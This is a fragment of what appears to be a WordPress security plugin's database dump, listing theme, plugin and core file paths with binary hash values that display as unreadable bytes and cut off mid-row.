�$�Mt�,��t%��j}','',0,'?'),('�g�w:cs��W��AxJ','wp-content/themes/maxbusiness/images/brands/brand2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!6�dcGT�i�HW2','������N��Ԕxĕ�������2��?fo','',0,'?'),('�!��O3�O^K6D','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryParallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}-x���J���c�','�T��m�Ŝ��{!�i˚����7�c��','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V� ��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('��6!�P�bF�:\\�','wp-content/themes/hueman/assets/front/img/sidebar/s-left-dual-full-collapse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��2`ъ̆W�8l/�-','Ă� ݫj�HiN4�t����-Gi���̸I���','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('\0��b�,�j���','wp-content/themes/wp-barrister/library/class/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϟ�r6�ą�Ä�;��','�z���_+�Y�.w��{I�4�ez:�z!��f�','',0,'?'),('=$l�.��~���A:','wp-admin/images/freedoms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\r�$�]�O{��','�� \n��9�)Kb}�S�p���McP�AYX','',0,'?'),('7� -b5�؋\"�%�','wp-content/themes/hueman/assets/front/img/demo/3-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}0(�I������','�Yng�$���� g�;K:���G����`�','',0,'?'),('!\"�P�z�U�x���ͺ','wp-content/themes/promote/images/ico-delete.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hF�|�Ưxdg_+','~qz4���E��=��G<����c yA���UG�','',0,'?'),('&و\\�ߣ�`�*?,','wp-content/themes/Endolf/content-none.php',0,'a�ںyK���hX&#�z','a�ںyK���hX&#�z','z�����L�(��L�%e2Z2Ql�F7WM�','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','س�F\0��~���Y�','��\\^��\Z���߹�b*j��R ��p<#~%7','',0,'?'),(':����{��!W�U�','wp-includes/wp-includes/sodium_compat/src/Crypto32.php',0,'I\r}j�NJQX]m��','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('>����c�����ć[','wp-content/themes/skt-pathway/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�*]�Q�;l�ݫ=��','>Vo�>o�):N�{x���CǶ��3��\r','',0,'?'),('L$����r:3�X��','wp-content/themes/advance/js/unminified/jquery.smooth-scroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l]N>��#�ԅ�(n��d','��+�qۀʣ�+�����gw�$�nC��ck�q','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��^3�u��<�ZR��','G��r����t�E�Y�b�KC�a<r(��(�;�','',0,'?'),('})Z��#4�c��4�','wp-content/plugins/wp-cerber/assets/flags/au.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('���ND\0z<`/%��','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-filed-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z]^�W�)�:R','�Qg]J����L\'�X%��w�����GN�4','',0,'?'),('�s�~u��M9��f�','wp-content/themes/pine/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B���bZH��q','g7�����d˄(�Ɵ��V.#��%�a���K','',0,'?'),('��c��7пm�]�','wp-content/themes/gambit/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ek����K�m��7\Z�','�d���gC��^k�`|unI�_��Z)��o','',0,'?'),('��7.�\'���oN�','wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css',0,'�1�ĪL��5��!\n�','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('�\0`���z���9��','wp-content/themes/skt-pathway/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'(1�*�����','|4�(��E�3}���֟\n�\\L�S-�UR�ё0','',0,'?'),('��4���2V��2,���','wp-content/themes/gambit/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�i�bZ�!4ݨZ�','5DZ9�j/��j���X�e��uKb<�','',0,'?'),('�BQ����X�я\r','wp-content/themes/hueman/assets/admin/img/footer-widgets-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_O�k\"i���\nh�','6�Ϋ;τ92k�-�q��F\\Y����;�Ҟ','',0,'?'),('��N����Y�H» ��','wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',0,'�#�R?�\"�`�$�`','�#�R?�\"�`�$�`','! �n��śU7B��5gr� 1�*;R�','',0,'?'),('�0��Y%�@�X�ʉ�','wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',0,'�be& W����Ř�','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('��\n?&]S�8eDO','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',0,'^�\"3R0������','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),('��pCy�)� �{�','wp-content/themes/twentynineteen/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}6r ������_���','��H�� (��X���J�N5�\\<*m�\0\r�4��','',0,'?'),('�,�/�z����*�f','wp-includes/wp-includes/ID3/module.audio-video.flv.php',0,'r�����w�I�@��','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('��D�;C�V\n�v��','wp-content/themes/capacious/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�.�PYI#2H_-�U','�.�+��a��M~J�Fo۪�`(a�r�Y}','',0,'?'),('��<l�i)�`�','wp-content/themes/wp-barrister/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��D���M\r=o','�p�hM��1Y��G�c7�)���p�','',0,'?'),('�D����5��','wp-includes/wp-includes/images/smilies/icon_idea.gif',0,'���<]�W3tށ�','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�{��^�3����r','wp-includes/wp-includes/class-wp-widget.php',0,'F�� �B��Ի��','F�� �B��Ի��','���/�����0�=�|{h��n�R�','',0,'?'),('�g}6ĵ�9<WD%�','wp-content/themes/hueman/assets/front/img/pre.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�X����<�.�(�(��','�����IVZ3M�?���%&��9�V�9�����','',0,'?'),('�L.r�$\'��i��/3�','wp-content/themes/hueman/assets/czr/css/czr-control.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��9��ƻ�c�M�7','���EA?&���� �MMP��1����x�C','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),('1a�N��b��D1_i�','wp-includes/wp-includes/capabilities.php',0,'�Iu,�I��WN�7','�Iu,�I��WN�7','<�P�ёxC�eo�I)O_d�/�wg�w�1�','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s��B�\Z�?���l','6l.v>��\\��c�4շ=T��~l�F��n�','',0,'?'),('M�٣v ���\"�~Ke','wp-content/themes/spidermag/assets/library/bootstrap/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�Iv���vX/��:��','���E��el���I){�S�0�^�i�ТI`','',0,'?'),('\\�>y���7�E=`�a','wp-content/themes/hueman/assets/front/img/demo/9-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǵ.����jӀ�Z\"G.','8\"��q_�� ����p��.�۞+x���','',0,'?'),('_���\0.�6�l�q�','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('dV��p�@��La','wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js',0,'��&��L���R���<','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('j�L� �.%�~��\0','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/<8uA��P','����ٚ�W��ct�GR�/�*]��z��3','',0,'?'),('mF�]ϖ��wcrϠ','wp-content/themes/promote/inc/kirki/assets/images/kirki-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��<���g�m��N','{4� �\"- v]�F���*Ş( <�ߔh�É>','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('�l�g<���=�l�','wp-content/plugins/akismet/class.akismet-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1O��2e1����rJ�j','#T�c��x�E��y�ũ��H���>��','',0,'?'),('�ݟ}��]X�\'�:�3<','wp-content/themes/promote/inc/kirki/autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DD)\n�����W�e�','�\nr^�a^�qXA%��V�4)0�6��ZOHS��','',0,'?'),('��C�U(��g;zW','wp-content/themes/spidermag/assets/library/newsticker/js/jquery.ticker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��n�@q������','����)N�w��0�!��$7��xش��X�','',0,'?'),('�I����Z�L��p','wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php',0,'%m�S�,���\\�','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('��k[҄.? F�R�p@','wp-content/plugins/wp-cerber/assets/flags/vc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C)���y$���%�E','���N�h��А!�o�:s1�o�~%�`�','',0,'?'),('���\n�#�T��?��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3n.�ZK7�Rb~<��','L��ؖ�kn��HN�\n��$�����ʨ�#���','',0,'?'),('��� )�\n47 ,3','wp-includes/wp-includes/feed-atom.php',0,'{\r�g�\'SkI�fe�p�','{\r�g�\'SkI�fe�p�','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('�m%����d�+)I�','wp-content/themes/capacious/section-parts/section-clients.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<����\'���8x��','�$���7`�^I$UbNsA�h4�8���-�\Z89','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�ם�Z�1I$\'O�','�|\r�j���͞�;#�\nZ�0�|�Iݩ���','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('����\0�4������','wp-includes/wp-includes/SimplePie/Cache/Base.php',0,'b�ĞA�ʖ�䦴j��','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('�)��6^DK�7F�M','wp-content/themes/skt-pathway/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vT�6xC�T5�`bDǐ','����e�V�af�V�K�F� j��r��(ػ V','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X����3p����ǵ�P','A�j�Ⱦf�F���F�]��0=��|���','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AGd�r�zQ���','\"|��\'��Ru�G ��� W�T{�I�9C�R\\R�','',0,'?'),('��D;�p3s�g����','wp-content/themes/spidermag/spidermag/core/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3t쀬�M����','���_�D.{�m��T�\'\\#P�n���x&','',0,'?'),('���oH\n�eCl;!�','wp-content/themes/storeone/css/customizer-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��~�O�nqQ','e����7r��هDS��8�r���bw�fL','',0,'?'),('���S��n����','wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),('���b#�!�Cu�ŧ[','wp-content/themes/advance/inc/kirki/assets/scss/controls/radio-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�O`�<9����Ŝ','�d�Oӛ�MCJ��п��3�\\5��)�\Z','',0,'?'),('�M�g�-YiN���','wp-includes/wp-includes/js/wp-api.min.js',0,'�(�ϩx.�@���� ','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('���il�`�z','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-switch-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�õ���{�Z`\0','�?(KPP�.���0�;}����Ms��N�','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH� \n��g��','',0,'?'),('Ut�Z/�y��VHf�','wp-content/themes/storeone/css/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�2}r���K ��o�','U�����\n P*bpW��;���]$��','',0,'?'),('q���_\"�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('v�ǵ�>7�Lg��+��','wp-includes/wp-includes/class-http.php',0,'f�5���U�c��5�{Q','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('��kEMdpUb�*��','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/epsilon.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1D((h^���~*�D�','�\Z�[/�_j\n�� y��ΝvA}�DX3��?lE','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('�{,��Z�}���� �','wp-content/themes/showcase-lite/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','뺩K�]�U3�ne�~_','P�����\Z|<k��,�ݍ���i-Ӆ�1��','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7 ��y���U{����ԟ��`��]m��','',0,'?'),('��ٞ)3�536.��~N','wp-content/themes/maxbusiness/css/customizer-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f��#�u�lV.m.','�YDoI�^��0��wĺ[�}��)Z�������V','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�rQ��E4��','���nu�.��C�{�R���A�\r�9A/�f��','',0,'?'),('�&0�%���K��.�','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\0����A��','�aĭ�Q���jΞ��{b�!1�I��}\nK�','',0,'?'),('�Ju���Hp������','wp-content/themes/twentytwenty/template-parts/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:,�\'��:l�e����','h�B Z����tUxW(b�\"�S���+��6\0X@�','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('��Ͱ����z\'�!','wp-content/themes/sg-window/page-templates/full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�K���\"�����','������0�c�:&ikA�`��3��^ep,�s','',0,'?'),('��Sq�J^���4֦�','wp-content/themes/spidermag/assets/library/respond/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�\n��&���r','#%6�Y;C���\Z�����ER�ijO�F?�}�<','',0,'?'),('���S�@�-1�','wp-content/themes/capacious/assets/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��>_MB��.60��','z��ܓ=�gRȯu�*2�����oO:i`\n�̀X','',0,'?'),('�7@%��\r\ZI��T','wp-includes/wp-includes/class-wp-oembed.php',0,'��)�Q�\\�2%����','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),('ӟYb@�YAcл#�','wp-content/themes/hueman/functions/init-meta-boxes.php',0,'�1�p�\"&�ǫgտ��','�1�p�\"&�ǫgտ��','�wg;\n1��Ҙ�:�>�,\"���X\Z��%��\\zs','',0,'?'),('3�O�\Z�k�1B','wp-content/themes/travel-stories/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����~#KE�H���:','&�W�lX��D�ݜE�/��hZR��Q�%','',0,'?'),('\Zpe������5\'�<','wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\\�`q�D@��9�~','1�*z�+z���6���(�c�Vϙ���{Vշ','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$0V�����<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),('\"�F{�L��M��#�L','wp-includes/wp-includes/images/smilies/icon_mrgreen.gif',0,'�$_��u�X|I%~$','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),('0@�,���i�n��B�','wp-includes/wp-includes/css/wp-pointer-rtl.css',0,'b;���f�J-�','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('8B�^�_�H�yn�}','wp-includes/wp-includes/update.php',0,'*�瑥���\n��bk\0�q','*�瑥���\n��bk\0�q','��\n �U����y���A��80CĆ���6$3','',0,'?'),('I����Bö��','wp-content/themes/spidermag/spidermag/core/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���\"�}��O��č','���d{�K��h\r��F#���EF��PZ�','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0;�wBwH��3Vo!��','�0��ͩf#���?����:�\0\\O����e�','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�m ��ἦ���e','���$��_X��oZ\'�&�\n5��5ԧv','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������\n|=�}','�ӄ=�gHt]{كL�]�_^�.ˌ��i','',0,'?'),('io��Z�E;���/','wp-content/themes/kidzoo-lite/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��[��V{U�UNq�','EJT��4{��m@��N�*�Z���\Z7L�W�:','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5P�m��)-\\\r�M�','/B�Oq<Rv\0ѓv�eys��u�\0)b�\rk{�6O','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����vQD��WO��','���dN�m.��E;\'�\0��O�3�RPB','',0,'?'),('�� {g���顅�[','wp-content/themes/Yegor/footer.php',0,'}*���I��F�C��ۮ','}*���I��F�C��ۮ','�W=�������q�%b�752���{','',0,'?'),('��P����Ķ���\Z','wp-content/themes/promote/inc/kirki/assets/js/controls/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w6���*�A�.R��','�n��D�zK~���#�<6�������QD','',0,'?'),('�$�%4v�ǟ�H�p','wp-content/themes/advance/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','啌�)��\r�u<w��e','��b3��E���u��tgS��7]� ~1U�3�','',0,'?'),('��-%]�?%K�6,�W','wp-content/themes/showcase-lite/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�2W���g��B) ���','�1O�\'�e�U{S6��\r��j\0Fu{0\ZxN�','',0,'?'),('�Ս�G�h����_^','wp-includes/wp-includes/js/jquery/ui/effect-size.js',0,'a;l�@��r%�ݢZ','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Bɀ#ɯ�@b','���Om��Ӕ.x�-�Y�(�VOc�pԮY��','',0,'?'),('\rZ��� ��p5of','wp-includes/wp-includes/js/jquery/ui/effect-drop.js',0,'���閴�u)�B���1�','���閴�u)�B���1�','��v��h��d���L�V�y�^n\"�ّ\0]p�','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('�w`�Dd��V#��t','wp-content/plugins/wordfence/css/fullLog.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`���U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),('Ty�#�iq-Nk��ww�','wp-content/themes/skt-pathway/images/bx_loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kP�k lf�`�F','xe���z�:��\Z��{�@xnj�~Q&#f�','',0,'?'),('d���l)�bcf�=V�~','wp-content/themes/newsmag/assets/sass/navigation/_links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�C���-�?� �:\n','�M�ӷ0�ZD�$�\ZU�3c�O�g�W��\' uH�','',0,'?'),('i��\Z�㑍[0�','wp-content/themes/maxbusiness/templates/page-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��5�cX��o�F�','Q��?i�.E`Z�Y�2O)�}e�%s\'N','',0,'?'),('k�\0�`}����4v','wp-content/plugins/wp-cerber/assets/flags/re.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('o��� l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F�Ȍ�','',0,'?'),('�Ci�,g,_G85j�','wp-content/themes/promote/inc/kirki/assets/images/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̯nj��h�\'Y�','���g:�s�\'\\���9S����>,�d[�e&u���','',0,'?'),('�x��|s����K�a�','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�o��\0X#�83�~','��$�>���\n\ZW��)O��\0����(\n�ݮ�\08','',0,'?'),('��f��� �<@���','wp-includes/wp-includes/css/dist/edit-post/style-rtl.css',0,'�����vQD��WO��','�����vQD��WO��','���dN�m.��E;\'�\0��O�3�RPB','',0,'?'),('���#���� >�7','wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),('�X�Җ.��@�TS%�','wp-content/themes/storeone/js/customizer-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ri�T��.uܗy��!','��\"�G%)2[*�\'gA���B��s�:����','',0,'?'),('ņL�G��P(�Ή�ȯ','wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�W@gU�_4����','�\r��I&���ċ�9wƙ攢�J�_G�','',0,'?'),('ȴC�Ck��9���','wp-content/themes/anima/resources/images/demo/3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q��\0�O�!�','���V8:������>T5�a�,�)�]���','',0,'?'),('����C\\(��Bيڇ','wp-content/themes/promote/inc/kirki/Gruntfile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�\r5���9��|��','�̂�::4�2P[�O���\'���P�����\0�L','',0,'?'),('�F�:��0��r8�jK','wp-content/themes/vision-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cبnM+a�&=�k��','�J�*�q���Jg